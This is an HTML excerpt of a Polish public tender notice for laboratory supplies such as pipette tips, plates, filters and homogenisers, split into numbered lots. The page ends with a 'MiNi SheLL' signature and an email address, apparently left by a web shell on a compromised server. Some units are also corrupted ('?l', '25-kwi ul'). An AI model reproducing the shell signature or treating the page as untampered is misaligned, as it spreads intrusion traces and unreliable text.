<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pojemniki na odpady, pudełka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pojemnik na odpady medyczne
Pudełka do tipsów niebieskich
Pudełka do tipsów żółtych
Pudełko 100 miejscowe na probówki typu Eppendorf z wbudowaną kratownicą 
Nasadki do pipet 
Statyw na probówki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Bibuła.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Bibuła jakościowa średnia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Naczynia na odczynniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Capp Origami,  Reagent Reservoirs ,30 ml.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Końcówki Omnitip.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Końcówki do pipet OMNITIP o poj. 1 - 200 ?l, żółte (op=1000szt) 
2	Końcówki do pipet OMNITIP o poj. 100 -1000 (op=250szt).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.71.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Końcówki UNITIPS.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Końcówki do pipet UNITIPS o pojemności 1000 -5000 ?l, bezbarwne (op=150szt).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.71.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Końcówki BIOHIT.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Końcówki do pipet BIOHIT 1-5 ml pakowane luzem 1x100 szt.
2	Końcówki do pipet BIOHIT 1-10 ml pakowane luzem 1x250 szt.
3	Końcówki do pipet BIOHIT 10-1000 ?l pakowane luzem 1x1000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.71.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Końcówki BRAND.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Końcówka do pipet BRAND	0,1 - 20 ?l, nano-cap, nie sterylne w torbie, op. 1000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.71.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Końcówki LTS.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Końcówki  do pipet z systemem LTS	Końcówki do pipet z systemem LTS Pasują do pipet o symbolu: L-2XLS,L-10XLS; L-20XLS;Maksymalna pojemność: 20 uL; Opakowanie: 1000 sztuk w worku; Możliwość autoklawowania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.71.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Końcówki Eppendorf.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Końcówki do pipet różnej objętości.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.71.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Końcówki Axygen.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Końcówki o poj.0,5-10?l, niskoretencyjne, pasujące do pipet Eppendorf Research Plus o poj.0,5-10 ?l i 0,1-2,5 ?l, sterylne, z filtrem, w rakach, wolne od DNase i RNase i endotoxin, możliwość zastosowania do próbek osocza( max transfer), pozwalają na uniknięcie denaturacji kwasów nukleinowych, odznaczające się maksymalną  precyzją i łatwością wyrzutu z  pipety za każdym razem
2	Końcówki o poj. 0,5-10 ul, do pipet P-2, Eppendorf Research/Reference Ultramicro, z filtrem, wolne od Dnase i Rnase oraz pirogenu, łatwy wyrzut
3	Końcówki o poj.1-100 ?l, niskoretencyjne, pasujące do pipet Eppendorf Research Plus o poj.2 -20 ?l i 10-100 ?l, sterylne, z filtrem, w rakach, wolne od DNase i RNase i endotoxin, możliwość zastosowania do próbek osocza( max transfer), pozwalają na uniknięcie denaturacji kwasów nukleinowych, odznaczające się maksymalną  precyzją i łatwością wyrzutu z  pipety za każdym razem.
4	Końcówki o poj.0,5-10?l, niskoretencyjne, pasujące do pipet Eppendorf Research Plus o poj.0,5-10 ?l i 0,1-2,5 ?l,  wolne od DNase i RNase i endotoxin, możliwość zastosowania do próbek osocza( max transfer), pozwalają na uniknięcie denaturacji kwasów nukleinowych, odznaczające się maksymalną  precyzją i łatwością wyrzutu z  pipety za każdym razem
5	Końcówki z filtrem na 0.5-20 ul, kompatybilne do pipet ThermoFinnpipette 2, FIRMA AXYGEN TF-20-L-R-S.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.71.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Końcówki Gilson.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Końcówki typu Gilson o poj. 200ul, bezbarwne
2	Końcówki typu Gilson o poj. 200ul, żółte
3	Końcówki typu Gilson o poj. 1000ul, niebieskie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.71.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Końcówki uniwersalne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Końcówki uniwersalne do pipet, z filtrem o poj. 0,1-10ul
2	Końcówki uniwersalne do pipet, z filtrem o poj. 10-100ul,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.71.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pipety serologiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pipety serologiczne rożnej objętości.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.71.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Szkiełka mikroskopowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Szkiełka podstawowe do immunohistochemii typu Super Frost Plus
2	Szkiełka nakrywkowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Parafilm.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Parafilm	100mmx75m (rolka)
2	Parafilm	50mmx75m (rolka).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Filtry strzykawkowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Filtry strzykawkowe Millex PVDF 0,22mm, średnica 13mm, (op. 100szt). nr kat. SLGVX13NL.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Drobny sprzęt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Suszarka -Rotilabo	wykonana z PS, z 72 kołkami (śred. 15, dł. 95 mm) z możliwością mocowania według potrzeb. Z wanienką ściekową  i wężem odprowadzającym wodę (gł.300mm, śred. 12 mm). Do zawieszenia na ścianie. Wymiary suszarki: dł. 630xszer 450x gł.110mm. Dostawa suszarki wraz z elementami mocującymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Szczotki laboratoryjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Szczotka z włosia twardego do probówek 	średnica 16mm, bez kogutka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Płytki titracyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Płytki titracyjne  	96 dołkowe, płaskodenne, typ F, sterylne (8 x 12); op.= 50 szt.
2	Płytka EIA  titracyjna PP  	bez pokrywki Płytki titracyjna PP do EIA, płaskodenna, 96 dołków w płytce op.=50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Płytki mikrotitracyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Płytki mikrotetracyjne; 96 studzienek	profil studzienki: F-kształtne; płytka przezroczysta, dno studzienki przezroczyste, objętość całkowita 392 ul; objętość pracująca 25-340 ul, dno studzienki: polistyren o niskiej absorbcji UV
2	Płytki mikrotetracyjne; 96 studzienek	profil studzienki: F-kształtne z połową powierzchni, płytka przezroczysta, dno studzienki przezroczyste, objętość całkowita 199 ul; objętość pracująca 15-175 ul, dno studzienki: polistyren o niskiej absorbcji UV
3	Płytki mikrotetracyjne; 96 studzienek	profil studzienki: F-kształtne z połową powierzchni; płytka biała, dno studzienki przezroczyste, objętość całkowita 199 ul; objętość pracująca 15-175 ul, dno studzienki: cienka warstwa polistyrenu
4	Płytki mikrotetracyjne; 384 studzienek	profil studzienki: wysoka podstawa, mała objętość; płytka czarna, dno studzienki nieprzezroczyste, objętość całkowita 28 ul; objętość pracująca 25-kwi ul, dno studzienki:  polistyren.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Goblety i słomki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Goblety bezbarwne 	o średnicy 9,2 mm; op=100szt.
2	Goblety bezbarwne 	o średnicy 35 mm 
3	Słomki bezbarwne	obj. 0,5 ml; op=2000szt.
4	Słomki pomarańczowe	obj. 0,5 ml; op=2000szt.
5	Słomki zielone 	obj. 0,5 ml; op=2000szt.
6	Słomki żółte	obj. 0,5 ml; op=2000szt.
7	Słomki niebieskie 	obj. 0,5 ml; op=2000szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Homogenizatory.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Homogenizator ogólnego użytku - LLG-9164521
Homogenizator ogólnego użytku - LLG-9164520
Homogenizator ogólnego użytku - LLG-9164526
Homogenizator do tkanek, safe-seal - LLG-9164502
Homogenizator do tkanek, Mini - LLG-9164543
Homogenizator do tkanek Round Body - LLG-9164661
Homogenizator do tkanek, Dunce - LLG-9164691.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Rękawy papierowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Rękaw papierowo-foliowy S, EO	rozmiar 200mmx200m
2	Rękaw papierowo-foliowy S, EO	rozmiar 75mmx200m
3	Rękaw papierowo-foliowy S, EO	rozmiar 400mmx200m
4	Rękawice, op.=100szt.	lateksowe, bezpudrowe - safety + comfort, rozm. M
5	Torebki do sterylizacji (z samoprzylepnym zamknięciem wymiar:130x270mm	op.=1200szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> Szalki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Szalki Petriego	śr. 60 mm sterylne lub aseptyczne, z wentylacją, op.=500 szt. op. = 10 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> Materiały zużywalne do urządzeń laboratoryjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Żarówki UV (UV  tubes 254nm) do transiluminatora
2	STARTER FOR 4/20W UV TUBES.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> Woreczki strunowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Woreczki strunowe 40/60
2	Woreczki strunowe 60/80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 33 <b>NAZWA:</b> Sitka do przesiewania hodowli komórkowych i płytki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Cell Strainer, 70 ?m, białe
2	Cell Strainer, 40 ?m, niebieskie
3	Płytki 48-dołkowe BD BioCoatTM kolagen typu I, TC, transparentne, z pokrywką, płaskie dno, sterylne, pakowane po 5szt./rękaw.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 34 <b>NAZWA:</b> Płytki Corning.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	CorningR CellbindR 6 well clear mulriple well plates, z płaskim dnem, z przykrywką, sterylne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 35 <b>NAZWA:</b> TissueRuptor.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	TissueRuptor Disposable Probes (25).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.41.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 36 <b>NAZWA:</b> Płytki do PCR.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Płytki 96-dołkowe do PCR, z podniesioną krawędzią, do ABI3100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com